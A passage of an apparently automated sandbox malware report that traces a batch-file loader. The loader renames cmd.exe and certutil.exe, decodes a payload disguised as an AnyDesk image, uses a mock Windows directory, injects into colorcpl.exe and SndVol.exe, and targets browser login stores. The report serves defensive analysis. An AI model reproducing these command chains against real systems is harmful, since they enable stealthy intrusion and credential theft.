                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_06F410DD mov eax, dword ptr fs:[00000030h]19_2_06F410DD
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_06F8408C mov eax, dword ptr fs:[00000030h]19_2_06F8408C
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823E4D5C InitializeCriticalSection,SetConsoleCtrlHandler,_get_osfhandle,GetConsoleMode,_get_osfhandle,GetConsoleMode,GetCommandLineW,GetCommandLineW,GetWindowsDirectoryW,GetConsoleOutputCP,GetCPInfo,GetProcessHeap,HeapAlloc,GetConsoleTitleW,GetStdHandle,GetConsoleScreenBufferInfo,GlobalFree,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,free,3_2_00007FF7823E4D5C
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823E8FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00007FF7823E8FA4
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823E93B0 SetUnhandledExceptionFilter,3_2_00007FF7823E93B0
                  Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7823E8FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FF7823E8FA4
                  Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7823E93B0 SetUnhandledExceptionFilter,5_2_00007FF7823E93B0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AD4E18 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00007FF6A2AD4E18
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AD53E0 SetUnhandledExceptionFilter,6_2_00007FF6A2AD53E0
                  Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7823E8FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00007FF7823E8FA4
                  Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7823E93B0 SetUnhandledExceptionFilter,10_2_00007FF7823E93B0
                  Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7823E8FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00007FF7823E8FA4
                  Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7823E93B0 SetUnhandledExceptionFilter,11_2_00007FF7823E93B0
                  Source: C:\Users\Public\alpha.pifCode function: 16_2_00866EC0 SetUnhandledExceptionFilter,16_2_00866EC0
                  Source: C:\Users\Public\alpha.pifCode function: 16_2_00866B40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00866B40
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_0043503C
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_00434A8A
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_0043BB71
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_00434BD8 SetUnhandledExceptionFilter,19_2_00434BD8
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_06F7C8A8 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_06F7C8A8
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_06F757C1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_06F757C1
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_06F75D73 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_06F75D73
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_06F7590F SetUnhandledExceptionFilter,19_2_06F7590F

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFMemory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 6F40000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFMemory allocated: C:\Windows\SysWOW64\SndVol.exe base: 4A70000 protect: page execute and read and write
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFThread created: C:\Windows\SysWOW64\colorcpl.exe EIP: 6F41628Jump to behavior
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFThread created: C:\Windows\SysWOW64\SndVol.exe EIP: 4A71628
                  Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file
                  Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFMemory written: C:\Windows\SysWOW64\colorcpl.exe base: 6F40000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFMemory written: C:\Windows\SysWOW64\SndVol.exe base: 4A70000 value starts with: 4D5A
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFMemory written: C:\Windows\SysWOW64\colorcpl.exe base: 6F40000Jump to behavior
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFMemory written: C:\Windows\SysWOW64\SndVol.exe base: 4A70000
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe19_2_00412132
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A87024 GetModuleHandleW,GetProcAddress,#356,#357,CloseHandle,LocalFree,LocalFree,LocalFree,ImpersonateLoggedOnUser,#356,EqualSid,#357,LogonUserExW,GetLastError,ImpersonateLoggedOnUser,#356,#359,RevertToSelf,#356,6_2_00007FF6A2A87024
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_00419662 mouse_event,19_2_00419662
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\saw.bat" "C:\\Users\\Public\\AnyDesk.jpeg" 9 Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12 Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\Libraries\AnyDesk.PIF C:\Users\Public\Libraries\AnyDesk.PIFJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AnyDesk.jpeg" / A / F / Q / S Jump to behavior
                  Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
                  Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\saw.bat" "C:\\Users\\Public\\AnyDesk.jpeg" 9 Jump to behavior
                  Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12 Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /oJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /oJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64" Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif" Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\Public\Libraries\AnyDesk.PIF /d C:\\Users\\Public\\Libraries\\Puyiaiob.PIF /oJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \" Jump to behavior
                  Source: C:\Users\Public\alpha.pifProcess created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A74AF4 GetSecurityDescriptorDacl,GetLastError,SetEntriesInAclW,SetSecurityDescriptorDacl,GetLastError,#357,#357,LocalFree,LocalFree,LocalFree,6_2_00007FF6A2A74AF4
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A84E98 AllocateAndInitializeSid,GetLastError,#357,GetCurrentThread,GetLastError,OpenThreadToken,GetLastError,GetCurrentProcess,GetLastError,OpenProcessToken,GetLastError,DuplicateToken,GetLastError,CheckTokenMembership,GetLastError,CloseHandle,CloseHandle,FreeSid,6_2_00007FF6A2A84E98
                  Source: colorcpl.exe, 00000013.00000002.4142210416.0000000003060000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager7T\
                  Source: colorcpl.exe, 00000013.00000002.4142210416.0000000003060000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managernfoz
                  Source: colorcpl.exe, 00000013.00000002.4142210416.0000000003060000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerknown.
                  Source: colorcpl.exe, 00000013.00000002.4142210416.0000000003060000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managernet
                  Source: colorcpl.exe, 00000013.00000002.4142210416.0000000003060000.00000004.00000020.00020000.00000000.sdmp, logs.dat.19.drBinary or memory string: [Program Manager]
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_00434CB6 cpuid 19_2_00434CB6
                  Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,3_2_00007FF7823E51EC
                  Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,3_2_00007FF7823E3140
                  Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,3_2_00007FF7823D6EE4
                  Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,5_2_00007FF7823E51EC
                  Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,5_2_00007FF7823E3140
                  Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,5_2_00007FF7823D6EE4
                  Source: C:\Users\Public\kn.exeCode function: LoadLibraryExW,SearchPathW,FindResourceExW,GetUserDefaultUILanguage,GetLocaleInfoW,wcsncmp,GetSystemDefaultUILanguage,FreeLibrary,FreeLibrary,LoadLibraryExW,FreeLibrary,6_2_00007FF6A2AD3800
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,9_2_02AA5ACC
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: GetLocaleInfoA,9_2_02AAA7C4
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,9_2_02AA5BD8
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: GetLocaleInfoA,9_2_02AAA810
                  Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,10_2_00007FF7823E51EC
                  Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,10_2_00007FF7823E3140
                  Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,10_2_00007FF7823D6EE4
                  Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,11_2_00007FF7823E51EC
                  Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,11_2_00007FF7823E3140
                  Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,11_2_00007FF7823D6EE4
                  Source: C:\Users\Public\alpha.pifCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,16_2_00858572
                  Source: C:\Users\Public\alpha.pifCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc,16_2_00856854
                  Source: C:\Users\Public\alpha.pifCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,16_2_00859310
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,19_2_0045201B
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,19_2_004520B6
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,19_2_00452143
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,19_2_00452393
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,19_2_00448484
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,19_2_004524BC
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,19_2_004525C3
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,19_2_00452690
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,19_2_0044896D
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoA,19_2_0040F90C
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,19_2_00451D58
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,19_2_00451FD0
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoA,19_2_06F50643
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,19_2_06F92E7A
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,19_2_06F92DED
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,19_2_06F92D52
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,19_2_06F92D07
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,19_2_06F92A8F
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,19_2_06F896A4
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,19_2_06F932FA
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,19_2_06F933C7
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,19_2_06F930CA
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,19_2_06F931F3
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,19_2_06F891BB
                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\Public\alpha.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\Public\alpha.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\Public\alpha.pifQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823E9584 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetTickCount,QueryPerformanceCounter,3_2_00007FF7823E9584
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A86CB4 ConvertStringSidToSidW,LookupAccountNameW,GetLastError,#359,LocalAlloc,#357,LocalAlloc,LookupAccountNameW,GetLastError,IsValidSid,LocalFree,LocalFree,6_2_00007FF6A2A86CB4
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_0044942D _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,19_2_0044942D
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823D586C GetVersion,3_2_00007FF7823D586C
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                  Source: AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: cmdagent.exe
                  Source: AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: quhlpsvc.exe
                  Source: AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgamsvr.exe
                  Source: AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
                  Source: AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Vsserv.exe
                  Source: AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgupsvc.exe
                  Source: AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgemc.exe
                  Source: AnyDesk.PIF, 00000009.00000003.1801997706.000000007ED60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1802241195.000000007F330000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1896259603.000000007F150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 30.2.SndVol.exe.4a70000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.colorcpl.exe.6f40000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.SndVol.exe.4a71937.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.colorcpl.exe.6f40000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.colorcpl.exe.6f41937.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.SndVol.exe.4a71937.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.SndVol.exe.4a70000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.colorcpl.exe.6f41937.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001E.00000003.1964735207.0000000002D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.4141580952.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000003.1964815243.0000000002D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.4143153198.0000000006F40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.1965808923.0000000004A70000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.1965400311.0000000002D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.4142210416.0000000003060000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.1964879579.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 7088, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 3848, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\ANYDESKS\logs.dat, type: DROPPED
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data19_2_0040BA4D
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\19_2_0040BB6B
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: \key3.db19_2_0040BB6B

                  Remote Access Functionality

                  barindex
                  Source: C:\Windows\SysWOW64\colorcpl.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-B5YX7TJump to behavior
                  Source: C:\Windows\SysWOW64\SndVol.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-B5YX7T
                  Source: Yara matchFile source: 30.2.SndVol.exe.4a70000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.colorcpl.exe.6f40000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.SndVol.exe.4a71937.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.colorcpl.exe.6f40000.2.raw.unpack, type: UNPACKEDPE
